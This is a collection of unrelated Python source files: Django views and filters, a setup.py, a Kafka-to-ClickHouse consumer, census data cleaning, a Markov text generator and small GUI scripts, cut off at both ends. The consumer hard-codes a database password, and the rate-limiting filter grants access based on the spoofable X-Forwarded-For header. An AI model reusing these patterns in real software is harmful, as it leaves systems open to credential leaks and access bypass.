        """Win condition: dice sum to 7 AND at least one die shows 4."""
        if (int(self.d1.get()) + int(self.d2.get()) + int(self.d3.get())) == 7:
            if(int(self.d1.get()) == 4 or int(self.d2.get()) == 4 or int(self.d3.get()) == 4):
                showinfo('Résultat', 'Vous avez gagné en %d coups' % (self.count))
    def exit(self):
        """Confirm dialog, then quit the mainloop."""
        showwarning('Quitter', 'Etes-vous sur de vouloir quitter ?')
        self.quit()
from setuptools import setup
import os, re
# The PyPI long description comes straight from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()
def get_version() -> str:
    """Get __version__ from kivg/__init__.py.

    Raises ValueError when no version string can be found.
    """
    version_file = os.path.join(os.path.dirname(__file__), "kivg", "__init__.py")
    # `with` closes the handle; the original leaked an open file object.
    with open(version_file, "rt", encoding="utf-8") as fp:
        version_file_data = fp.read()
    # Match the value between quotes on a line `__version__ = "..."`.
    version_regex = r"(?<=^__version__ = ['\"])[^'\"]+(?=['\"]$)"
    try:
        version = re.findall(version_regex, version_file_data, re.M)[0]
        return version
    except IndexError:
        raise ValueError(f"Unable to find version string in {version_file}.")
# Package definition; the version is read dynamically from kivg/__init__.py.
setup(
    name="Kivg",
    version=get_version(),
    packages=["kivg"],
    package_data={"kivg": ["*.py",],},
    # metadata to display on PyPI
    author="Shashi Ranjan",
    author_email="shashiranjankv@gmail.com",
    description="SVG path drawing and animation support in kivy application",
    long_description=long_description,
    long_description_content_type="text/markdown",
    keywords="svg svg-animations svg-path svg-images kivy-application kivy python",
    url="https://github.com/shashi278/svg-anim-kivy",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: Android",
        "Operating System :: Microsoft :: Windows",
        "Operating System :: OS Independent"
    ],
    install_requires=["kivy>=2.0.0", "svg.path==4.1"],
    python_requires=">=3.6",
)
import django_filters
from django.db.models import Q
from .models import Articles
import datetime
class ArticlesFilter(django_filters.rest_framework.FilterSet):
    """
    Filter set for articles.

    ``time``     -- substring match against the article's add_time.
    ``category`` -- matches the article's category or its parent category.
    """
    time = django_filters.CharFilter(method='time_filter')
    category = django_filters.NumberFilter(method='category_filter')
    def category_filter(self, queryset, name, value):
        # Keep articles whose category is `value` OR whose category's parent
        # is `value`, so filtering by a parent also returns its children.
        return queryset.filter(Q(category_id=value) | Q(category__parent_category_id=value))
    def time_filter(self, queryset, name, value):
        # Case-insensitive substring match on the add_time field.
        return queryset.filter(add_time__icontains=value)
    class Meta:
        model = Articles
        fields = []
|
import logging
from PyQt4.QtGui import QDialog, QVBoxLayout
from gui.widgets.itemwidget import ItemWidget
from gui.widgets.ui_basesettingsdialog import Ui_BaseSettingsDialog
logger = logging.getLogger('console')
class WellSettingsDialog(QDialog, Ui_BaseSettingsDialog):
    '''
    Settings dialog for a well, built on the generated base-settings UI.

    Embeds an ItemWidget inside the dialog's item tab.
    '''
    def __init__(self, well, parent= None):
        super(WellSettingsDialog, self).__init__(parent)
        # the well whose settings this dialog edits
        self._well = well
        self.setupUi(self)
        self.addWidgets()
        self.populateData()
    def addWidgets(self):
        # Place an ItemWidget in the item tab via a vertical layout.
        itemWidget = ItemWidget()
        vBoxlayout = QVBoxLayout()
        vBoxlayout.addWidget(itemWidget)
        self.itemTab.setLayout(vBoxlayout)
    def populateData(self):
        # No data binding implemented yet.
        pass
|
#!/usr/bin/python
import pylsdj
import sys
import os.path
# check argv length
# Check argv length (minimum; the .sav form needs one extra argument).
if (len(sys.argv) < 4):
    sys.exit('Usage : python patcher.py ([SAVEFILE.sav] [#TRACKNUMBER] or [SONGFILE.srm|.lsdsng]) [SYNTH.snt] [#SYNTHNUMBER]')
# Path of the file to patch.
savpath = sys.argv[1]
ext = os.path.splitext(savpath)[1]
# Gather the project depending on the extension.
if ext == '.sav':
    # .sav form: patcher.py SAVEFILE.sav TRACK SYNTH.snt SYNTHNUMBER
    synthpath = sys.argv[3]
    synthnumber = int(sys.argv[4])
    sav = pylsdj.SAVFile(savpath)
    project = sav.projects[int(sys.argv[2])]
elif ext == '.srm' or ext == '.lsdsng':
    # single-song form: patcher.py SONGFILE SYNTH.snt SYNTHNUMBER
    synthpath = sys.argv[2]
    synthnumber = int(sys.argv[3])
    project = pylsdj.load_srm(savpath) if ext == '.srm' else pylsdj.load_lsdsng(savpath)
else:
    sys.exit('Invalid savefile/songfile (extension ' + ext + ' unsupported).')
# Get the synth to patch.
song = project.song
synth = song.synths[synthnumber]
# Read the raw synth data.
with open(synthpath, 'rb') as f:
    synthdata = f.read()
# Chunk synth data into 16-byte waves.
synthdata = [synthdata[x:x+16] for x in range(0, len(synthdata), 16)]
for i in range(len(synthdata)):
    for j in range(len(synthdata[i])):
        # Python 2 iterates bytes as str (ord() needed); Python 3 yields
        # ints directly. Narrowed from bare `except:` so real errors in
        # pylsdj are not silently swallowed.
        try:
            synth.waves[i][2*j] = ord(synthdata[i][j]) >> 4
        except TypeError:
            synth.waves[i][2*j] = synthdata[i][j] >> 4
        try:
            synth.waves[i][2*j+1] = ord(synthdata[i][j]) & 0x0F
        except TypeError:
            synth.waves[i][2*j+1] = synthdata[i][j] & 0x0F
# Save the modified file.
if ext == '.sav':
    sav.save(savpath)
    print(savpath + ' saved!')
elif ext == '.srm':
    project.save_srm(savpath)
    print(savpath + ' saved!')
elif ext == '.lsdsng':
    project.save_lsdsng(savpath)
    print(savpath + ' saved!')
else:
    # Unreachable: unsupported extensions already exited above.
    sys.exit('Invalid savefile/songfile (extension ' + ext + ' unsupported).')
|
from kafka import KafkaConsumer
import json, datetime
from clickhouse_driver import Client
# Consume JSON messages from the 'analytics' topic; timeout makes the inner
# for-loop return periodically so the outer while can poll again.
consumer = KafkaConsumer('analytics', auto_offset_reset='earliest', bootstrap_servers=['localhost:9092'], api_version=(0, 10), consumer_timeout_ms=1000, value_deserializer=lambda m: json.loads(m.decode('utf-8')))
client = Client(host='localhost', password='123')
client.execute('CREATE DATABASE IF NOT EXISTS telegram')
# Per-message channel metrics.
create_channels_query = '''
CREATE TABLE IF NOT EXISTS telegram.channels
(
    channel_id String,
    sender_name String,
    UUID UUID,
    views Int32,
    timestamp Float32,
    date DateTime
)
ENGINE = MergeTree
PARTITION BY date ORDER BY (timestamp)
'''
# One row per hashtag/keyword occurrence.
create_keywords_query = '''
CREATE TABLE IF NOT EXISTS telegram.keywords
(
    keyword String,
    sender_name String,
    timestamp Float32,
    date DateTime
)
ENGINE = MergeTree
PARTITION BY date ORDER BY (timestamp)
'''
client.execute(create_channels_query)
client.execute(create_keywords_query)
# Poll forever: each consumed message becomes one channels row plus one
# keywords row per hashtag/keyword.
while(True):
    for item in consumer:
        new_item = item.value
        client.execute(
            'INSERT INTO telegram.channels (channel_id, sender_name, UUID, views, timestamp, date) VALUES',
            [( str(new_item['peer_id']['channel_id']), new_item['sender_name'], new_item['UUID'], new_item['views'], new_item['timestamp'], datetime.datetime.strptime(new_item['date'] + 'T' + new_item['time'], "%Y-%m-%dT%H:%M:%S") )]
        )
        for kw in new_item['hashtags'] + new_item['keywords']:
            client.execute(
                'INSERT INTO telegram.keywords (keyword, sender_name, timestamp, date) VALUES',
                [( kw, new_item['sender_name'], new_item['timestamp'], datetime.datetime.strptime(new_item['date'] + 'T' + new_item['time'], "%Y-%m-%dT%H:%M:%S") )]
            )
        print(datetime.datetime.now(),"new message inserted into clickhouse")
# Manual cleanup helpers (run interactively when needed):
#client.execute('DROP TABLE telegram.channels')
# client.execute('DROP TABLE telegram.keywords')
# client.execute('DROP DATABASE telegram')
from models import RobotKiller
from django.utils import timezone
from django.core.exceptions import PermissionDenied
# Throttling thresholds: more than `max_visits` requests inside a
# `min_seconds`-second window marks a client as a bot.
max_visits = 100
min_seconds = 300
def ip_bot_filter(request):
    """Per-IP rate limiting for allowed IP prefixes.

    Tracks visit counts per IP in RobotKiller rows and raises
    PermissionDenied (HTTP 403) for disallowed IPs or flagged bots.
    """
    allowed_ips = ['10', '127.0.0.1'] # localhost
    #allowed_ips = ['10', '60.205.107.184', '211.144.0.55']
    # Prefer the proxy-forwarded address when present.
    # (`in` replaces the Python-2-only dict.has_key.)
    if 'HTTP_X_FORWARDED_FOR' in request.META:
        request_ip = request.META['HTTP_X_FORWARDED_FOR']
    else:
        request_ip = request.META['REMOTE_ADDR']
    # Allowed when the ip itself or its first two chars ('10' prefix) match.
    if request_ip[:2] in allowed_ips or request_ip in allowed_ips:
        try:
            record = RobotKiller.objects.get(ip=request_ip)
        except RobotKiller.DoesNotExist:
            # First visit: start a fresh counter window.
            RobotKiller.objects.create(ip=request_ip, visits=1, time=timezone.now(), status='allowed')
            return
        passed_seconds = (timezone.now() - record.time).seconds
        # NOTE(review): status is only ever created as 'allowed' and the
        # 'banned' assignment below is never saved, so this branch can
        # never fire -- confirm the intended ban condition.
        if record.visits > max_visits and passed_seconds < min_seconds and record.status == 'banned':
            record.status = 'banned'
            # PermissionDenied (imported above) yields a proper 403 instead
            # of the original untyped `raise Exception`.
            raise PermissionDenied
        else:
            if passed_seconds < min_seconds:
                record.visits = record.visits + 1
                record.save()
            else:
                # Window expired: restart the counter.
                record.visits = 1
                record.time = timezone.now()
                record.save()
    else:
        raise PermissionDenied
|
import datetime
from dateutil.parser import parse
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template.defaultfilters import pluralize
from django.urls import reverse
from django.utils import timezone
from django.views.generic import CreateView, TemplateView
from homeschool.core.schedules import Week
from homeschool.courses.models import GradedWork
from homeschool.schools.forms import GradeLevelForm, SchoolYearForm
from homeschool.schools.models import GradeLevel, SchoolYear
from homeschool.students.models import Coursework, Grade, Student
class IndexView(TemplateView):
    """Render the public core/index.html landing page."""
    template_name = "core/index.html"
class AppView(LoginRequiredMixin, TemplateView):
    """Weekly schedule view: one schedule per student for the selected week."""
    template_name = "core/app.html"
    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(*args, **kwargs)
        today = self.request.user.get_local_today()
        # Optional year/month/day URL kwargs select the displayed day;
        # default to the user's local today.
        year = self.kwargs.get("year")
        month = self.kwargs.get("month")
        day = self.kwargs.get("day")
        if year and month and day:
            day = datetime.date(year, month, day)
        else:
            day = today
        context["day"] = day
        week = Week(day)
        # Fix the corner case when the weekly view is used and today falls in the week.
        # In that scenario, don't point at the first day of the week
        # since it messes with the UI.
        if week.monday <= today <= week.sunday:
            context["day"] = today
        context["monday"], context["sunday"] = week.monday, week.sunday
        context["previous_week_date"] = context["monday"] - datetime.timedelta(days=7)
        context["next_week_date"] = context["monday"] + datetime.timedelta(days=7)
        # School year containing today, with grade levels/courses preloaded.
        school_year = (
            SchoolYear.objects.filter(
                school=self.request.user.school,
                start_date__lte=today,
                end_date__gte=today,
            )
            .prefetch_related("grade_levels", "grade_levels__courses")
            .first()
        )
        week_dates = []
        if school_year:
            week_dates = school_year.get_week_dates_for(week)
        context["week_dates"] = week_dates
        context["schedules"] = self.get_schedules(school_year, today, week)
        return context
    def get_schedules(self, school_year, today, week):
        """Get the schedules for each student."""
        schedules: list = []
        if school_year is None:
            return schedules
        for student in Student.get_students_for(school_year):
            schedule = student.get_week_schedule(school_year, today, week)
            schedules.append(schedule)
        return schedules
class DailyView(LoginRequiredMixin, TemplateView):
    """Daily schedule view: shows and records each student's work for one day."""
    template_name = "core/daily.html"
    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(*args, **kwargs)
        today = self.request.user.get_local_today()
        # Optional year/month/day URL kwargs select the displayed day.
        year = self.kwargs.get("year")
        month = self.kwargs.get("month")
        day = self.kwargs.get("day")
        if year and month and day:
            day = datetime.date(year, month, day)
        else:
            day = today
        context["day"] = day
        # School year containing the displayed day.
        school_year = (
            SchoolYear.objects.filter(
                school=self.request.user.school, start_date__lte=day, end_date__gte=day
            )
            .prefetch_related("grade_levels", "grade_levels__courses")
            .first()
        )
        # When the school year isn't in progress yet,
        # the offset calculations should come
        # relative to the start of the school year.
        if school_year and today < school_year.start_date:
            today = school_year.start_date
        # Set previous and next days navigation.
        if school_year:
            context["yesterday"] = school_year.get_previous_day_from(day)
            context["ereyesterday"] = school_year.get_previous_day_from(
                context["yesterday"]
            )
            context["tomorrow"] = school_year.get_next_day_from(day)
            context["overmorrow"] = school_year.get_next_day_from(context["tomorrow"])
        else:
            # No school year: plain calendar-day navigation.
            context["ereyesterday"] = day - datetime.timedelta(days=2)
            context["yesterday"] = day - datetime.timedelta(days=1)
            context["tomorrow"] = day + datetime.timedelta(days=1)
            context["overmorrow"] = day + datetime.timedelta(days=2)
        context["schedules"] = self.get_schedules(school_year, today, day)
        return context
    def get_schedules(self, school_year, today, day):
        """Get the schedules for each student."""
        schedules: list = []
        if not school_year:
            return schedules
        if not school_year.runs_on(day):
            # No schedules on non-school days.
            return schedules
        for student in Student.get_students_for(school_year):
            courses = student.get_courses(school_year)
            schedule = self.get_student_schedule(student, today, day, courses)
            schedules.append(schedule)
        return schedules
    def get_student_schedule(self, student, today, day, courses):
        """Get the daily schedule for the student."""
        day_coursework = student.get_day_coursework(day)
        completed_task_ids = list(
            Coursework.objects.filter(
                student=student, course_task__course__in=courses
            ).values_list("course_task_id", flat=True)
        )
        schedule = {"student": student, "courses": []}
        for course in courses:
            course_schedule = {"course": course}
            if course.id in day_coursework:
                # Work already recorded for this course on this day.
                course_schedule["coursework"] = day_coursework[course.id]
            elif course.runs_on(day):
                # Pick the next uncompleted task, offset by how many tasks
                # the course schedules between today and the displayed day.
                task_index = max(course.get_task_count_in_range(today, day) - 1, 0)
                # Doing this query in a loop is definitely an N+1 bug.
                # If it's possible to do a single query of all tasks
                # that groups by course then that would be better.
                # No need to over-optimize until that's a real issue.
                # I brought this up on the forum. It doesn't look like it's easy to fix.
                # https://forum.djangoproject.com/t/grouping-by-foreignkey-with-a-limit-per-group/979
                try:
                    course_schedule["task"] = student.get_tasks_for(course).exclude(
                        id__in=completed_task_ids
                    )[task_index]
                except IndexError:
                    course_schedule["no_scheduled_task"] = True
            schedule["courses"].append(course_schedule)
        return schedule
    def post(self, request, *args, **kwargs):
        """Process students' work."""
        completed_date = timezone.now().date()
        if "completed_date" in request.POST:
            completed_date = parse(request.POST["completed_date"])
        tasks_by_student = self.get_task_completions_by_student(request.POST)
        work_to_grade = False
        if tasks_by_student:
            for student_id, tasks in tasks_by_student.items():
                student = request.user.school.students.filter(id=student_id).first()
                if student:
                    has_work_to_grade = self.mark_completion(
                        student, tasks, completed_date
                    )
                    if has_work_to_grade:
                        work_to_grade = True
        # Redirect to grading when any newly completed work needs a grade.
        if work_to_grade:
            success_url = self.get_grade_url()
        else:
            success_url = request.GET.get("next", reverse("core:daily"))
        return HttpResponseRedirect(success_url)
    def get_task_completions_by_student(self, post_data):
        """Parse out the tasks."""
        tasks: dict = {}
        # Form field names look like "task-<student_id>-<task_id>".
        for key, value in post_data.items():
            if not key.startswith("task"):
                continue
            parts = key.split("-")
            student_id = int(parts[1])
            task_id = int(parts[2])
            if student_id not in tasks:
                tasks[student_id] = {"complete": [], "incomplete": []}
            # Checkbox value "on" marks a task as complete.
            category = "complete" if value == "on" else "incomplete"
            tasks[student_id][category].append(task_id)
        return tasks
    def get_grade_url(self):
        # Preserve the caller's `next` target through the grading page.
        grade_url = reverse("students:grade")
        next_url = self.request.GET.get("next", reverse("core:daily"))
        return f"{grade_url}?next={next_url}"
    def mark_completion(self, student, tasks, completed_date):
        """Mark completed tasks or clear already complete tasks."""
        has_work_to_grade = self.process_complete_tasks(
            student, tasks["complete"], completed_date
        )
        self.process_incomplete_tasks(student, tasks["incomplete"])
        return has_work_to_grade
    def process_complete_tasks(self, student, complete_task_ids, completed_date):
        """Add coursework for any tasks that do not have it."""
        has_work_to_grade = False
        existing_complete_task_ids = set(
            Coursework.objects.filter(
                student=student, course_task__in=complete_task_ids
            ).values_list("course_task_id", flat=True)
        )
        newly_complete_task_ids = set(complete_task_ids) - existing_complete_task_ids
        if newly_complete_task_ids:
            new_coursework = []
            for task_id in newly_complete_task_ids:
                new_coursework.append(
                    Coursework(
                        student=student,
                        course_task_id=task_id,
                        completed_date=completed_date,
                    )
                )
            Coursework.objects.bulk_create(new_coursework)
            pluralized = pluralize(len(newly_complete_task_ids))
            message = "Completed {} task{} for {}.".format(
                len(newly_complete_task_ids), pluralized, student.full_name
            )
            messages.add_message(self.request, messages.SUCCESS, message)
            # Work needs grading when it has graded work without a grade yet.
            graded_work_ids = set(
                GradedWork.objects.filter(
                    course_task__in=newly_complete_task_ids
                ).values_list("id", flat=True)
            )
            already_graded_work_ids = set(
                Grade.objects.filter(
                    student=student, graded_work__in=graded_work_ids
                ).values_list("graded_work_id", flat=True)
            )
            has_work_to_grade = bool(graded_work_ids - already_graded_work_ids)
        return has_work_to_grade
    def process_incomplete_tasks(self, student, incomplete_task_ids):
        """Remove any coursework for tasks that are marked as incomplete."""
        delete_info = Coursework.objects.filter(
            student=student, course_task__in=incomplete_task_ids
        ).delete()
        coursework_deleted = delete_info[0]
        if coursework_deleted > 0:
            pluralized = pluralize(coursework_deleted)
            message = "Undid {} task{} for {}.".format(
                coursework_deleted, pluralized, student.full_name
            )
            messages.add_message(self.request, messages.SUCCESS, message)
class StartView(LoginRequiredMixin, TemplateView):
    """Render the onboarding start page (core/start.html)."""
    template_name = "core/start.html"
class StartSchoolYearView(LoginRequiredMixin, CreateView):
    """Onboarding step: create the first SchoolYear for the user's school."""
    template_name = "core/start_school_year.html"
    form_class = SchoolYearForm
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Any existing school year, so the template can adapt its messaging.
        context["school_year"] = SchoolYear.objects.filter(
            school=self.request.user.school
        ).first()
        return context
    def get_success_url(self):
        return reverse("core:start-grade-level")
    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        kwargs["user"] = self.request.user
        if "data" in kwargs:
            # Since this view is for easy onboarding,
            # set a reasonable standard week.
            # The QueryDict is immutable so it must be copied to update it.
            data = kwargs["data"].copy()
            data.update(
                {
                    "monday": True,
                    "tuesday": True,
                    "wednesday": True,
                    "thursday": True,
                    "friday": True,
                }
            )
            kwargs["data"] = data
        return kwargs
class StartGradeLevelView(LoginRequiredMixin, CreateView):
    """Onboarding step: create the first GradeLevel for the school year."""
    template_name = "core/start_grade_level.html"
    form_class = GradeLevelForm
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Existing grade level / school year let the template adjust its copy.
        context["grade_level"] = GradeLevel.objects.filter(
            school_year__school=self.request.user.school
        ).first()
        context["school_year"] = SchoolYear.objects.filter(
            school=self.request.user.school
        ).first()
        return context
    def get_success_url(self):
        return reverse("core:start-course")
    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        kwargs["user"] = self.request.user
        return kwargs
class StartCourseView(LoginRequiredMixin, TemplateView):
    """Onboarding step: render the start-course page."""
    template_name = "core/start_course.html"
class StartCourseTaskView(LoginRequiredMixin, TemplateView):
    """Onboarding step for course tasks."""
    # NOTE(review): reuses start_course.html -- a dedicated
    # start_course_task.html seems intended; confirm.
    template_name = "core/start_course.html"
# Staff-only endpoint that raises on purpose.
@staff_member_required
def boom(request):
    """This is for checking error handling (like Rollbar)."""
    raise Exception("Is this thing on?")
def handle_500(request):
    """Custom 500 handler: render the error template with status 500."""
    context = {}
    return render(request, "500.html", context, status=500)
|
import os
from zipfile import ZipFile
from datetime import datetime
import pandas as pd
import numpy as np
import re
folder = '/Users/kayinho/git/hispanic/'
extension = ".zip"
def unzip_all(dir):
    """Extract every ``*.zip`` archive found directly inside *dir* into ``data/``.

    Bug fix: the archive path is now built from *dir* (the directory that was
    actually listed) instead of the module-level ``folder``, which pointed at a
    different directory and made every open fail for files under
    ``zipped_data/``.
    """
    for item in os.listdir(dir):
        if item.endswith(extension):
            path = os.path.join(dir, item)
            with ZipFile(path, 'r') as zip_ref:
                zip_ref.extractall('data')


unzip_all(os.path.join(folder, 'zipped_data/'))
def modify_unwanted(dir):
    """Clean up an extracted ACS download directory.

    Deletes ``*.txt`` files and anything containing ``metadata``, then renames
    the remaining ``ACS*`` data files to ``<table-id>.csv``.

    Bug fixes versus the original:
    - removed files are no longer also considered for renaming (an
      ``ACS*metadata*`` file used to be deleted and then crash the subsequent
      ``os.rename``);
    - the rename target is a bare file name joined with *dir* once, instead of
      an already-prefixed path passed through ``os.path.join`` a second time.
    """
    for item in os.listdir(dir):
        if item.endswith('txt') or 'metadata' in item:
            os.remove(os.path.join(dir, item))
        elif item.startswith('ACS'):
            table_id = item.split('_')[0]
            os.rename(os.path.join(dir, item),
                      os.path.join(dir, table_id + '.csv'))
# Directory that unzip_all() extracted the ACS CSVs into.
datafolder = '/Users/kayinho/git/hispanic/data/'
modify_unwanted(datafolder)

# Chicago ZIP codes, used to filter the (state-wide) ACS ZCTA tables.
chiZCTA = 'data/CityofChicago_Zip_Codes.csv'
zipCodeData = pd.read_csv(os.path.join(folder, chiZCTA), sep=',', header=0)
chiZC = pd.DataFrame(zipCodeData['ZIP'].unique().astype(str), columns=[('Zip Code', 'Chicago')]).astype('string')

# ACS 5-year (2018) source tables, one file per topic (table id in the name).
population_all = 'data/ACSDP5Y2018.DP05.csv'
population = 'data/ACSDT5Y2018.B03003.csv'
healthcare = 'data/ACSDT5Y2018.C27001I.csv'
immigrant = 'data/ACSDT5Y2018.B05003I.csv'
language = 'data/ACSDT5Y2018.B16005I.csv'
jobs = 'data/ACSDT5Y2018.C24010I.csv'
transportation = 'data/ACSDT5Y2018.B08105I.csv'
relative = 'data/ACSDT5Y2018.B11002I.csv'
grandparents = 'data/ACSDT5Y2018.B10051I.csv'
occupants = 'data/ACSDT5Y2018.B25014I.csv'
income = 'data/ACSDT5Y2018.B19001I.csv'
foodstamp = 'data/ACSDT5Y2018.B22005I.csv'
poverty = 'data/ACSDT5Y2018.B17020I.csv'
def filter_for_CHI(file):
    """Load one ACS table and keep only rows for Chicago ZIP codes.

    Reads the two-row-header CSV, strips the ``'ZCTA5 '`` prefix from the
    geographic-area names so they match plain ZIP codes, left-merges against
    the Chicago ZIP list, restores the column index, and sorts by ZIP code.

    Fix: the per-row loop with chained indexing (a pandas SettingWithCopy
    hazard that may silently fail to write) is replaced by one vectorized
    ``str.replace``.
    """
    df = pd.read_csv(os.path.join(folder, file), sep=',', header=[0, 1])
    name_col = ('NAME', 'Geographic Area Name')
    df[name_col] = df[name_col].astype('string').str.replace('ZCTA5 ', '', regex=False)
    chi_df = pd.merge(
        chiZC, df, 'left',
        left_on=[('Zip Code', 'Chicago')],
        right_on=[name_col],
        left_index=False,
    )
    chi_df.columns = df.columns.insert(loc=0, item=('Zip Code', 'Chicago'))
    chi_df = chi_df.sort_values(by=[('Zip Code', 'Chicago')])
    return chi_df
# Filter every ACS table down to Chicago ZIP codes.  The commented-out
# .to_csv calls are one-off exports, kept as in the original.
population_all_chi_df = filter_for_CHI(os.path.join(folder, population_all))
#population_all_chi_df.to_csv(os.path.join(datafolder,'CHI_DP05.csv'), index = False)
population_all_chi_df
population_chi_df = filter_for_CHI(os.path.join(folder, population))
#population_chi_df.to_csv(os.path.join(datafolder,'CHI_B03003.csv'), index = False)
healthcare_chi_df = filter_for_CHI(os.path.join(folder, healthcare))
#healthcare_chi_df.to_csv(os.path.join(datafolder,'CHI_C27001I.csv'), index = False)
immigrant_chi_df = filter_for_CHI(os.path.join(folder, immigrant))
#immigrant_chi_df.to_csv(os.path.join(datafolder,'CHI_B05003I.csv'), index = False)
language_chi_df = filter_for_CHI(os.path.join(folder, language))
#language_chi_df.to_csv(os.path.join(datafolder,'CHI_B16005I.csv'), index = False)
jobs_chi_df = filter_for_CHI(os.path.join(folder, jobs))
#jobs_chi_df.to_csv(os.path.join(datafolder,'CHI_C24010I.csv'), index = False)
transportation_chi_df = filter_for_CHI(os.path.join(folder, transportation))
#transportation_chi_df.to_csv(os.path.join(datafolder,'CHI_B08105I.csv'), index = False)
relative_chi_df = filter_for_CHI(os.path.join(folder, relative))
#relative_chi_df.to_csv(os.path.join(datafolder,'CHI_B11002I.csv'), index = False)
grandparents_chi_df = filter_for_CHI(os.path.join(folder, grandparents))
#grandparents_chi_df.to_csv(os.path.join(datafolder,'CHI_B10051I.csv'), index = False)
occupants_chi_df = filter_for_CHI(os.path.join(folder, occupants))
#occupants_chi_df.to_csv(os.path.join(datafolder,'CHI_B25014I.csv'), index = False)
# Bug fix: the three frames below previously re-read the `immigrant` table
# instead of their own source files.
income_chi_df = filter_for_CHI(os.path.join(folder, income))
#income_chi_df.to_csv(os.path.join(datafolder,'CHI_B19001I.csv'), index = False)
foodstamp_chi_df = filter_for_CHI(os.path.join(folder, foodstamp))
#foodstamp_chi_df.to_csv(os.path.join(datafolder,'CHI_B22005I.csv'), index = False)
poverty_chi_df = filter_for_CHI(os.path.join(folder, poverty))
#poverty_chi_df.to_csv(os.path.join(datafolder,'CHI_B17020I.csv'), index = False)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 22 13:45:07 2019
DATA PRE-PROCESSING AND MARKOV MODEL
@author: Murphy
"""
import nltk as tk
from numpy.random import choice
# read in all text files to a string
# Corpus state shared across the module.
unique_words = []   # distinct tokens, in first-seen order
all_words = []      # every kept token from every line, in order
sentences = []      # one cleaned sentence string per input line


def loadText(filename):
    """Read a tweet file and accumulate cleaned text.

    Each line is expected to end with three date/metadata tokens, which are
    dropped; tokens containing ``http`` (links) are filtered out.  Cleaned
    sentences are appended to ``sentences`` and their words to ``all_words``.

    Returns the whole cleaned corpus as one space-separated string.

    Robustness fix: lines with fewer than three tokens are skipped instead of
    crashing on ``list.pop`` from an empty list.
    """
    clean = ""
    with open(filename, "r", encoding='utf-8-sig') as f:
        for line in f:
            words = line.split()
            if len(words) < 3:
                # Too short to carry the three trailing metadata tokens.
                continue
            # Drop the trailing date/metadata tokens.
            del words[-3:]
            kept = [w for w in words if "http" not in w]
            sentence = "".join(w + " " for w in kept)
            clean += sentence
            sentences.append(sentence)
    all_words.extend(clean.split())
    return clean
# LOAD AND PREPROCESS A DATA SET
loadText("economisttweets.txt")

# Scan words to build the distinct vocabulary (first-seen order).
for word in all_words:
    if word in unique_words:
        n = 0  # no-op placeholder; Python needs a statement here
    else:
        unique_words.append(word)

# p_start[i]: probability that unique_words[i] starts a sentence.
p_start = [0.0] * len(unique_words)
num_unique_words = len(unique_words)
p_start_sum = 0
# find the start of each sentence and increase the count in p_start index
# NOTE(review): an empty sentence string would make words[0] raise IndexError
# here — confirm loadText can never append one.
for sentence in sentences:
    words = sentence.split()
    start_word = words[0]
    start_word_index = unique_words.index(start_word)
    p_start[start_word_index] += 1
    p_start_sum += 1
# turn p_start into probabilities by dividing value by sum
index = 0
while (index < len(p_start)):
    p_start[index] /= p_start_sum
    index += 1

# calculate probabilities that each word is before another word
# for each row, count each time every word(column) appears after it in all words
# divide each column by the sum of each row
first_order_matrix = [[0.0 for x in range(num_unique_words)] for y in range(num_unique_words)]
curr_word_index = 0
for word in all_words:
    row_index = unique_words.index(word)
    following_word_position = curr_word_index + 1
    if following_word_position < len(all_words):
        following_word = all_words[following_word_position]
        col_index = unique_words.index(following_word)
        first_order_matrix[row_index][col_index] += 1
    curr_word_index += 1
# NOTE(review): a word that only ever appears as the very last token has a
# zero row sum, making the division below raise ZeroDivisionError — confirm
# the corpus guarantees this cannot happen.
for row in range(num_unique_words):
    row_sum = sum(first_order_matrix[row])
    for column in range(num_unique_words):
        first_order_matrix[row][column] /= row_sum
def get_first_word():
    """Sample one sentence-initial word using the start-word distribution."""
    return choice(unique_words, 1, p=p_start)
def choose_word(current_word):
    """Sample the next word from *current_word*'s first-order transition row."""
    row = first_order_matrix[unique_words.index(current_word)]
    return choice(unique_words, 1, p=row)
def write_sentence(num_words):
    """Generate a sentence of *num_words* words from the Markov chain."""
    words = [get_first_word()[0]]
    for _ in range(num_words - 1):
        words.append(choose_word(words[-1])[0])
    return " ".join(words)
def write_sentence_with(start_word, length):
    """Generate a *length*-word sentence beginning with *start_word*."""
    words = [start_word]
    for _ in range(length - 1):
        words.append(choose_word(words[-1])[0])
    return " ".join(words)
def saveClean(filename):
    """Write every cleaned sentence to *filename*, one per line."""
    with open(filename, "w", encoding='utf-8-sig') as f:
        f.writelines("%s\n" % line for line in sentences)
# GENERATE A HEADLINE
# Fix: the generated sentence was computed and discarded (likely a notebook
# cell originally); print it so the script actually shows its output.
print(write_sentence(10))
"""
In de klasse meet_controller worden nieuwe Dashboardviews en eenheidControllers aangemaakt.
De master wordt hier doorgegeven aan Dashboardview. Alle waarden van het Dashboard worden hier opgevraagd
en maken met deze waarden het programma interactief.
Created: 10-11-2018
Author: Jeloambo
Version: 1.2.6
"""
from controller.eenheid_controller import *
from time import sleep
from view.Dashboardview import Dashboardview
from threading import Thread
class meetController:
    def __init__(self, master):
        """
        Initialize all instance attributes.

        :param dashboard: a new Dashboardview created around *master*.
        :param e: a new eenheidController (unit controller).
        :param eenheden: list of all units and their values.
        :param createThread: this call starts the sensor polling threads.
        """
        self.dashboard = Dashboardview(master)
        self.e = eenheidController()
        self.eenheden = self.e.haal_eenheden()
        self.createThread()

    # Store the current value of every sensor unit in the database.
    def sla_waarde_op(self):
        for t in self.eenheden:
            q = "INSERT INTO j_values (value, datetime, unit_id) VALUES (%s, CURRENT_TIMESTAMP, %s)"
            p = (t.waarde, t.id)
            self.e.db.insert(q, p)

    # Create one daemon thread per sensor polling loop.
    def createThread(self):
        self.threadtemp = Thread(target=self.loop_temperatuursensor)
        self.threadtemp.setDaemon(True)  # NOTE: deprecated; `daemon=True` is the modern spelling
        self.threadtemp.start()
        self.threadlicht = Thread(target=self.loop_lichtsensor)
        self.threadlicht.setDaemon(True)
